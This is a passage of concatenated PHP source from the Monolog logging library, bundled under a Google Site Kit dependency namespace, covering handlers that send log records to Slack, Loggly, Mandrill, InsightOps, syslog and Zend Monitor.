\Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_WARNING, \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_ERROR, \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_ERROR, \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_ERROR, \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_ERROR]; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->writeZendMonitorCustomEvent(\Google\Site_Kit_Dependencies\Monolog\Logger::getLevelName($record['level']), $record['message'], $record['formatted'], $this->levelMap[$record['level']]); } /** * Write to Zend Monitor Events * @param string $type Text displayed in "Class Name (custom)" field * @param string $message Text displayed in "Error String" * @param array $formatted Displayed in Custom Variables tab * @param int $severity Set the event severity level (-1,0,1) * * @phpstan-param FormattedRecord $formatted */ protected function writeZendMonitorCustomEvent(string $type, string $message, array $formatted, int $severity) : void { zend_monitor_custom_event($type, $message, $formatted, $severity); } /** * {@inheritDoc} */ public function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter(); } /** * @return array<int, int> */ public function getLevelMap() : array { return $this->levelMap; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Interface to describe loggers that have a formatter * * @author Jordi Boggiano <j.boggiano@seld.be> */ interface FormattableHandlerInterface { /** * Sets the formatter. * * @param FormatterInterface $formatter * @return HandlerInterface self */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface; /** * Gets the formatter. * * @return FormatterInterface */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Inspired on LogEntriesHandler. * * @author Robert Kaufmann III <rok3@rok3.me> * @author Gabriel Machado <gabriel.ms1@hotmail.com> */ class InsightOpsHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { /** * @var string */ protected $logToken; /** * @param string $token Log token supplied by InsightOps * @param string $region Region where InsightOps account is hosted. Could be 'us' or 'eu'. * @param bool $useSSL Whether or not SSL encryption should be used * * @throws MissingExtensionException If SSL encryption is set to true and OpenSSL is missing */ public function __construct(string $token, string $region = 'us', bool $useSSL = \true, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { if ($useSSL && !\extension_loaded('openssl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The OpenSSL PHP plugin is required to use SSL encrypted connection for InsightOpsHandler'); } $endpoint = $useSSL ? 'ssl://' . $region . '.data.logs.insight.rapid7.com:443' : $region . '.data.logs.insight.rapid7.com:80'; parent::__construct($endpoint, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); $this->logToken = $token; } /** * {@inheritDoc} */ protected function generateDataStream(array $record) : string { return $this->logToken . ' ' . $record['formatted']; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Handler\Slack\SlackRecord; /** * Sends notifications through Slack API * * @author Greg Kedzierski <greg@gregkedzierski.com> * @see https://api.slack.com/ * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class SlackHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { /** * Slack API token * @var string */ private $token; /** * Instance of the SlackRecord util class preparing data for Slack API. * @var SlackRecord */ private $slackRecord; /** * @param string $token Slack API token * @param string $channel Slack channel (encoded ID or name) * @param string|null $username Name of a bot * @param bool $useAttachment Whether the message should be added to Slack as attachment (plain text otherwise) * @param string|null $iconEmoji The emoji name to use (or null) * @param bool $useShortAttachment Whether the context/extra messages added to Slack as attachments are in a short style * @param bool $includeContextAndExtra Whether the attachment should include context and extra data * @param string[] $excludeFields Dot separated list of fields to exclude from slack message. E.g. ['context.field1', 'extra.field2'] * @throws MissingExtensionException If no OpenSSL PHP extension configured */ public function __construct(string $token, string $channel, ?string $username = null, bool $useAttachment = \true, ?string $iconEmoji = null, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL, bool $bubble = \true, bool $useShortAttachment = \false, bool $includeContextAndExtra = \false, array $excludeFields = array(), bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { if (!\extension_loaded('openssl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The OpenSSL PHP extension is required to use the SlackHandler'); } parent::__construct('ssl://slack.com:443', $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); $this->slackRecord = new \Google\Site_Kit_Dependencies\Monolog\Handler\Slack\SlackRecord($channel, $username, $useAttachment, $iconEmoji, $useShortAttachment, $includeContextAndExtra, $excludeFields); $this->token = $token; } public function getSlackRecord() : \Google\Site_Kit_Dependencies\Monolog\Handler\Slack\SlackRecord { return $this->slackRecord; } public function getToken() : string { return $this->token; } /** * {@inheritDoc} */ protected function generateDataStream(array $record) : string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * Builds the body of API call * * @phpstan-param FormattedRecord $record */ private function buildContent(array $record) : string { $dataArray = $this->prepareContentData($record); return \http_build_query($dataArray); } /** * @phpstan-param FormattedRecord $record * @return string[] */ protected function prepareContentData(array $record) : array { $dataArray = $this->slackRecord->getSlackData($record); $dataArray['token'] = $this->token; if (!empty($dataArray['attachments'])) { $dataArray['attachments'] = \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($dataArray['attachments']); } return $dataArray; } /** * Builds the header of the API Call */ private function buildHeader(string $content) : string { $header = "POST /api/chat.postMessage HTTP/1.1\r\n"; $header .= "Host: slack.com\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . \strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } /** * {@inheritDoc} */ protected function write(array $record) : void { parent::write($record); $this->finalizeWrite(); } /** * Finalizes the request by reading some bytes and then closing the socket * * If we do not read some but close the socket too early, slack sometimes * drops the request entirely. */ protected function finalizeWrite() : void { $res = $this->getResource(); if (\is_resource($res)) { @\fread($res, 2048); } $this->closeSocket(); } public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { parent::setFormatter($formatter); $this->slackRecord->setFormatter($formatter); return $this; } public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $formatter = parent::getFormatter(); $this->slackRecord->setFormatter($formatter); return $formatter; } /** * Channel used by the bot when posting */ public function setChannel(string $channel) : self { $this->slackRecord->setChannel($channel); return $this; } /** * Username used by the bot when posting */ public function setUsername(string $username) : self { $this->slackRecord->setUsername($username); return $this; } public function useAttachment(bool $useAttachment) : self { $this->slackRecord->useAttachment($useAttachment); return $this; } public function setIconEmoji(string $iconEmoji) : self { $this->slackRecord->setUserIcon($iconEmoji); return $this; } public function useShortAttachment(bool $useShortAttachment) : self { $this->slackRecord->useShortAttachment($useShortAttachment); return $this; } public function includeContextAndExtra(bool $includeContextAndExtra) : self { $this->slackRecord->includeContextAndExtra($includeContextAndExtra); return $this; } /** * @param string[] $excludeFields */ public function excludeFields(array $excludeFields) : self { $this->slackRecord->excludeFields($excludeFields); return $this; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Used for testing purposes. * * It records all records and gives you access to them for verification. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @method bool hasEmergency($record) * @method bool hasAlert($record) * @method bool hasCritical($record) * @method bool hasError($record) * @method bool hasWarning($record) * @method bool hasNotice($record) * @method bool hasInfo($record) * @method bool hasDebug($record) * * @method bool hasEmergencyRecords() * @method bool hasAlertRecords() * @method bool hasCriticalRecords() * @method bool hasErrorRecords() * @method bool hasWarningRecords() * @method bool hasNoticeRecords() * @method bool hasInfoRecords() * @method bool hasDebugRecords() * * @method bool hasEmergencyThatContains($message) * @method bool hasAlertThatContains($message) * @method bool hasCriticalThatContains($message) * @method bool hasErrorThatContains($message) * @method bool hasWarningThatContains($message) * @method bool hasNoticeThatContains($message) * @method bool hasInfoThatContains($message) * @method bool hasDebugThatContains($message) * * @method bool hasEmergencyThatMatches($message) * @method bool hasAlertThatMatches($message) * @method bool hasCriticalThatMatches($message) * @method bool hasErrorThatMatches($message) * @method bool hasWarningThatMatches($message) * @method bool hasNoticeThatMatches($message) * @method bool hasInfoThatMatches($message) * @method bool hasDebugThatMatches($message) * * @method bool hasEmergencyThatPasses($message) * @method bool hasAlertThatPasses($message) * @method bool hasCriticalThatPasses($message) * @method bool hasErrorThatPasses($message) * @method bool hasWarningThatPasses($message) * @method bool hasNoticeThatPasses($message) * @method bool hasInfoThatPasses($message) * @method bool hasDebugThatPasses($message) * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class TestHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var Record[] */ protected $records = []; /** @var array<Level, Record[]> */ protected $recordsByLevel = []; /** @var bool */ private $skipReset = \false; /** * @return array * * @phpstan-return Record[] */ public function getRecords() { return $this->records; } /** * @return void */ public function clear() { $this->records = []; $this->recordsByLevel = []; } /** * @return void */ public function reset() { if (!$this->skipReset) { $this->clear(); } } /** * @return void */ public function setSkipReset(bool $skipReset) { $this->skipReset = $skipReset; } /** * @param string|int $level Logging level value or name * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecords($level) : bool { return isset($this->recordsByLevel[\Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level)]); } /** * @param string|array $record Either a message string or an array containing message and optionally context keys that will be checked against all records * @param string|int $level Logging level value or name * * @phpstan-param array{message: string, context?: mixed[]}|string $record * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecord($record, $level) : bool { if (\is_string($record)) { $record = array('message' => $record); } return $this->hasRecordThatPasses(function ($rec) use($record) { if ($rec['message'] !== $record['message']) { return \false; } if (isset($record['context']) && $rec['context'] !== $record['context']) { return \false; } return \true; }, $level); } /** * @param string|int $level Logging level value or name * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecordThatContains(string $message, $level) : bool { return $this->hasRecordThatPasses(function ($rec) use($message) { return \strpos($rec['message'], $message) !== \false; }, $level); } /** * @param string|int $level Logging level value or name * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecordThatMatches(string $regex, $level) : bool { return $this->hasRecordThatPasses(function (array $rec) use($regex) : bool { return \preg_match($regex, $rec['message']) > 0; }, $level); } /** * @param string|int $level Logging level value or name * @return bool * * @psalm-param callable(Record, int): mixed $predicate * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecordThatPasses(callable $predicate, $level) { $level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); if (!isset($this->recordsByLevel[$level])) { return \false; } foreach ($this->recordsByLevel[$level] as $i => $rec) { if ($predicate($rec, $i)) { return \true; } } return \false; } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->recordsByLevel[$record['level']][] = $record; $this->records[] = $record; } /** * @param string $method * @param mixed[] $args * @return bool */ public function __call($method, $args) { if (\preg_match('/(.*)(Debug|Info|Notice|Warning|Error|Critical|Alert|Emergency)(.*)/', $method, $matches) > 0) { $genericMethod = $matches[1] . ('Records' !== $matches[3] ? 'Record' : '') . $matches[3]; $level = \constant('Monolog\\Logger::' . \strtoupper($matches[2])); $callback = [$this, $genericMethod]; if (\is_callable($callback)) { $args[] = $level; return \call_user_func_array($callback, $args); } } throw new \BadMethodCallException('Call to undefined method ' . \get_class($this) . '::' . $method . '()'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; /** * Helper trait for implementing FormattableInterface * * @author Jordi Boggiano <j.boggiano@seld.be> */ trait FormattableHandlerTrait { /** * @var ?FormatterInterface */ protected $formatter; /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { $this->formatter = $formatter; return $this; } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { if (!$this->formatter) { $this->formatter = $this->getDefaultFormatter(); } return $this->formatter; } /** * Gets the default formatter. * * Overwrite this if the LineFormatter is not a good default for your handler. */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Swift; use Google\Site_Kit_Dependencies\Swift_Message; /** * MandrillHandler uses cURL to send the emails to the Mandrill API * * @author Adam Nicholson <adamnicholson10@gmail.com> */ class MandrillHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\MailHandler { /** @var Swift_Message */ protected $message; /** @var string */ protected $apiKey; /** * @psalm-param Swift_Message|callable(): Swift_Message $message * * @param string $apiKey A valid Mandrill API key * @param callable|Swift_Message $message An example message for real messages, only the body will be replaced */ public function __construct(string $apiKey, $message, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true) { parent::__construct($level, $bubble); if (!$message instanceof \Google\Site_Kit_Dependencies\Swift_Message && \is_callable($message)) { $message = $message(); } if (!$message instanceof \Google\Site_Kit_Dependencies\Swift_Message) { throw new \InvalidArgumentException('You must provide either a Swift_Message instance or a callable returning it'); } $this->message = $message; $this->apiKey = $apiKey; } /** * {@inheritDoc} */ protected function send(string $content, array $records) : void { $mime = 'text/plain'; if ($this->isHtmlBody($content)) { $mime = 'text/html'; } $message = clone $this->message; $message->setBody($content, $mime); /** @phpstan-ignore-next-line */ if (\version_compare(\Google\Site_Kit_Dependencies\Swift::VERSION, '6.0.0', '>=')) { $message->setDate(new \DateTimeImmutable()); } else { /** @phpstan-ignore-next-line */ $message->setDate(\time()); } $ch = \curl_init(); \curl_setopt($ch, \CURLOPT_URL, 'https://mandrillapp.com/api/1.0/messages/send-raw.json'); \curl_setopt($ch, \CURLOPT_POST, 1); \curl_setopt($ch, \CURLOPT_RETURNTRANSFER, 1); \curl_setopt($ch, \CURLOPT_POSTFIELDS, \http_build_query(['key' => $this->apiKey, 'raw_message' => (string) $message, 'async' => \false])); \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($ch); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler\Slack; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Slack record utility helping to log to Slack webhooks or API. * * @author Greg Kedzierski <greg@gregkedzierski.com> * @author Haralan Dobrev <hkdobrev@gmail.com> * @see https://api.slack.com/incoming-webhooks * @see https://api.slack.com/docs/message-attachments * * @phpstan-import-type FormattedRecord from \Monolog\Handler\AbstractProcessingHandler * @phpstan-import-type Record from \Monolog\Logger */ class SlackRecord { public const COLOR_DANGER = 'danger'; public const COLOR_WARNING = 'warning'; public const COLOR_GOOD = 'good'; public const COLOR_DEFAULT = '#e3e4e6'; /** * Slack channel (encoded ID or name) * @var string|null */ private $channel; /** * Name of a bot * @var string|null */ private $username; /** * User icon e.g. 'ghost', 'http://example.com/user.png' * @var string|null */ private $userIcon; /** * Whether the message should be added to Slack as attachment (plain text otherwise) * @var bool */ private $useAttachment; /** * Whether the the context/extra messages added to Slack as attachments are in a short style * @var bool */ private $useShortAttachment; /** * Whether the attachment should include context and extra data * @var bool */ private $includeContextAndExtra; /** * Dot separated list of fields to exclude from slack message. E.g. ['context.field1', 'extra.field2'] * @var string[] */ private $excludeFields; /** * @var ?FormatterInterface */ private $formatter; /** * @var NormalizerFormatter */ private $normalizerFormatter; /** * @param string[] $excludeFields */ public function __construct(?string $channel = null, ?string $username = null, bool $useAttachment = \true, ?string $userIcon = null, bool $useShortAttachment = \false, bool $includeContextAndExtra = \false, array $excludeFields = array(), ?\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter = null) { $this->setChannel($channel)->setUsername($username)->useAttachment($useAttachment)->setUserIcon($userIcon)->useShortAttachment($useShortAttachment)->includeContextAndExtra($includeContextAndExtra)->excludeFields($excludeFields)->setFormatter($formatter); if ($this->includeContextAndExtra) { $this->normalizerFormatter = new \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter(); } } /** * Returns required data in format that Slack * is expecting. * * @phpstan-param FormattedRecord $record * @phpstan-return mixed[] */ public function getSlackData(array $record) : array { $dataArray = array(); $record = $this->removeExcludedFields($record); if ($this->username) { $dataArray['username'] = $this->username; } if ($this->channel) { $dataArray['channel'] = $this->channel; } if ($this->formatter && !$this->useAttachment) { /** @phpstan-ignore-next-line */ $message = $this->formatter->format($record); } else { $message = $record['message']; } if ($this->useAttachment) { $attachment = array('fallback' => $message, 'text' => $message, 'color' => $this->getAttachmentColor($record['level']), 'fields' => array(), 'mrkdwn_in' => array('fields'), 'ts' => $record['datetime']->getTimestamp(), 'footer' => $this->username, 'footer_icon' => $this->userIcon); if ($this->useShortAttachment) { $attachment['title'] = $record['level_name']; } else { $attachment['title'] = 'Message'; $attachment['fields'][] = $this->generateAttachmentField('Level', $record['level_name']); } if ($this->includeContextAndExtra) { foreach (array('extra', 'context') as $key) { if (empty($record[$key])) { continue; } if ($this->useShortAttachment) { $attachment['fields'][] = $this->generateAttachmentField((string) $key, $record[$key]); } else { // Add all extra fields as individual fields in attachment $attachment['fields'] = \array_merge($attachment['fields'], $this->generateAttachmentFields($record[$key])); } } } $dataArray['attachments'] = array($attachment); } else { $dataArray['text'] = $message; } if ($this->userIcon) { if (\filter_var($this->userIcon, \FILTER_VALIDATE_URL)) { $dataArray['icon_url'] = $this->userIcon; } else { $dataArray['icon_emoji'] = ":{$this->userIcon}:"; } } return $dataArray; } /** * Returns a Slack message attachment color associated with * provided level. */ public function getAttachmentColor(int $level) : string { switch (\true) { case $level >= \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR: return static::COLOR_DANGER; case $level >= \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING: return static::COLOR_WARNING; case $level >= \Google\Site_Kit_Dependencies\Monolog\Logger::INFO: return static::COLOR_GOOD; default: return static::COLOR_DEFAULT; } } /** * Stringifies an array of key/value pairs to be used in attachment fields * * @param mixed[] $fields */ public function stringify(array $fields) : string { /** @var Record $fields */ $normalized = $this->normalizerFormatter->format($fields); $hasSecondDimension = \count(\array_filter($normalized, 'is_array')); $hasNonNumericKeys = !\count(\array_filter(\array_keys($normalized), 'is_numeric')); return $hasSecondDimension || $hasNonNumericKeys ? \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($normalized, \JSON_PRETTY_PRINT | \Google\Site_Kit_Dependencies\Monolog\Utils::DEFAULT_JSON_FLAGS) : \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($normalized, \Google\Site_Kit_Dependencies\Monolog\Utils::DEFAULT_JSON_FLAGS); } /** * Channel used by the bot when posting * * @param ?string $channel * * @return static */ public function setChannel(?string $channel = null) : self { $this->channel = $channel; return $this; } /** * Username used by the bot when posting * * @param ?string $username * * @return static */ public function setUsername(?string $username = null) : self { $this->username = $username; return $this; } public function useAttachment(bool $useAttachment = \true) : self { $this->useAttachment = $useAttachment; return $this; } public function setUserIcon(?string $userIcon = null) : self { $this->userIcon = $userIcon; if (\is_string($userIcon)) { $this->userIcon = \trim($userIcon, ':'); } return $this; } public function useShortAttachment(bool $useShortAttachment = \false) : self { $this->useShortAttachment = $useShortAttachment; return $this; } public function includeContextAndExtra(bool $includeContextAndExtra = \false) : self { $this->includeContextAndExtra = $includeContextAndExtra; if ($this->includeContextAndExtra) { $this->normalizerFormatter = new \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter(); } return $this; } /** * @param string[] $excludeFields */ public function excludeFields(array $excludeFields = []) : self { $this->excludeFields = $excludeFields; return $this; } public function setFormatter(?\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter = null) : self { $this->formatter = $formatter; return $this; } /** * Generates attachment field * * @param string|mixed[] $value * * @return array{title: string, value: string, short: false} */ private function generateAttachmentField(string $title, $value) : array { $value = \is_array($value) ? \sprintf('```%s```', \substr($this->stringify($value), 0, 1990)) : $value; return array('title' => \ucfirst($title), 'value' => $value, 'short' => \false); } /** * Generates a collection of attachment fields from array * * @param mixed[] $data * * @return array<array{title: string, value: string, short: false}> */ private function generateAttachmentFields(array $data) : array { /** @var Record $data */ $normalized = $this->normalizerFormatter->format($data); $fields = array(); foreach ($normalized as $key => $value) { $fields[] = $this->generateAttachmentField((string) $key, $value); } return $fields; } /** * Get a copy of record with fields excluded according to $this->excludeFields * * @phpstan-param FormattedRecord $record * * @return mixed[] */ private function removeExcludedFields(array $record) : array { foreach ($this->excludeFields as $field) { $keys = \explode('.', $field); $node =& $record; $lastKey = \end($keys); foreach ($keys as $key) { if (!isset($node[$key])) { break; } if ($lastKey === $key) { unset($node[$key]); break; } $node =& $node[$key]; } } return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use DateTimeInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Handler\SyslogUdp\UdpSocket; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * A Handler for logging to a remote syslogd server. * * @author Jesper Skovgaard Nielsen <nulpunkt@gmail.com> * @author Dominik Kukacka <dominik.kukacka@gmail.com> */ class SyslogUdpHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractSyslogHandler { const RFC3164 = 0; const RFC5424 = 1; const RFC5424e = 2; /** @var array<self::RFC*, string> */ private $dateFormats = array(self::RFC3164 => 'M d H:i:s', self::RFC5424 => \DateTime::RFC3339, self::RFC5424e => \DateTime::RFC3339_EXTENDED); /** @var UdpSocket */ protected $socket; /** @var string */ protected $ident; /** @var self::RFC* */ protected $rfc; /** * @param string $host Either IP/hostname or a path to a unix socket (port must be 0 then) * @param int $port Port number, or 0 if $host is a unix socket * @param string|int $facility Either one of the names of the keys in $this->facilities, or a LOG_* facility constant * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * @param string $ident Program name or tag for each log message. * @param int $rfc RFC to format the message for. * @throws MissingExtensionException * * @phpstan-param self::RFC* $rfc */ public function __construct(string $host, int $port = 514, $facility = \LOG_USER, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, string $ident = 'php', int $rfc = self::RFC5424) { if (!\extension_loaded('sockets')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The sockets extension is required to use the SyslogUdpHandler'); } parent::__construct($facility, $level, $bubble); $this->ident = $ident; $this->rfc = $rfc; $this->socket = new \Google\Site_Kit_Dependencies\Monolog\Handler\SyslogUdp\UdpSocket($host, $port); } protected function write(array $record) : void { $lines = $this->splitMessageIntoLines($record['formatted']); $header = $this->makeCommonSyslogHeader($this->logLevels[$record['level']], $record['datetime']); foreach ($lines as $line) { $this->socket->write($line, $header); } } public function close() : void { $this->socket->close(); } /** * @param string|string[] $message * @return string[] */ private function splitMessageIntoLines($message) : array { if (\is_array($message)) { $message = \implode("\n", $message); } $lines = \preg_split('/$\\R?^/m', (string) $message, -1, \PREG_SPLIT_NO_EMPTY); if (\false === $lines) { $pcreErrorCode = \preg_last_error(); throw new \RuntimeException('Could not preg_split: ' . $pcreErrorCode . ' / ' . \Google\Site_Kit_Dependencies\Monolog\Utils::pcreLastErrorMessage($pcreErrorCode)); } return $lines; } /** * Make common syslog header (see rfc5424 or rfc3164) */ protected function makeCommonSyslogHeader(int $severity, \DateTimeInterface $datetime) : string { $priority = $severity + $this->facility; if (!($pid = \getmypid())) { $pid = '-'; } if (!($hostname = \gethostname())) { $hostname = '-'; } if ($this->rfc === self::RFC3164) { // see https://github.com/phpstan/phpstan/issues/5348 // @phpstan-ignore-next-line $dateNew = $datetime->setTimezone(new \DateTimeZone('UTC')); $date = $dateNew->format($this->dateFormats[$this->rfc]); return "<{$priority}>" . $date . " " . $hostname . " " . $this->ident . "[" . $pid . "]: "; } $date = $datetime->format($this->dateFormats[$this->rfc]); return "<{$priority}>1 " . $date . " " . $hostname . " " . $this->ident . " " . $pid . " - - "; } /** * Inject your own socket, mainly used for testing */ public function setSocket(\Google\Site_Kit_Dependencies\Monolog\Handler\SyslogUdp\UdpSocket $socket) : self { $this->socket = $socket; return $this; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LogglyFormatter; use function array_key_exists; use CurlHandle; /** * Sends errors to Loggly. * * @author Przemek Sobstel <przemek@sobstel.org> * @author Adam Pancutt <adam@pancutt.com> * @author Gregory Barchard <gregory@barchard.net> */ class LogglyHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { protected const HOST = 'logs-01.loggly.com'; protected const ENDPOINT_SINGLE = 'inputs'; protected const ENDPOINT_BATCH = 'bulk'; /** * Caches the curl handlers for every given endpoint. * * @var resource[]|CurlHandle[] */ protected $curlHandlers = []; /** @var string */ protected $token; /** @var string[] */ protected $tag = []; /** * @param string $token API token supplied by Loggly * * @throws MissingExtensionException If the curl extension is missing */ public function __construct(string $token, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if (!\extension_loaded('curl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The curl extension is needed to use the LogglyHandler'); } $this->token = $token; parent::__construct($level, $bubble); } /** * Loads and returns the shared curl handler for the given endpoint. * * @param string $endpoint * * @return resource|CurlHandle */ protected function getCurlHandler(string $endpoint) { if (!\array_key_exists($endpoint, $this->curlHandlers)) { $this->curlHandlers[$endpoint] = $this->loadCurlHandle($endpoint); } return $this->curlHandlers[$endpoint]; } /** * Starts a fresh curl session for the given endpoint and returns its handler. * * @param string $endpoint * * @return resource|CurlHandle */ private function loadCurlHandle(string $endpoint) { $url = \sprintf("https://%s/%s/%s/", static::HOST, $endpoint, $this->token); $ch = \curl_init(); \curl_setopt($ch, \CURLOPT_URL, $url); \curl_setopt($ch, \CURLOPT_POST, \true); \curl_setopt($ch, \CURLOPT_RETURNTRANSFER, \true); return $ch; } /** * @param string[]|string $tag */ public function setTag($tag) : self { $tag = !empty($tag) ? $tag : []; $this->tag = \is_array($tag) ? $tag : [$tag]; return $this; } /** * @param string[]|string $tag */ public function addTag($tag) : self { if (!empty($tag)) { $tag = \is_array($tag) ? $tag : 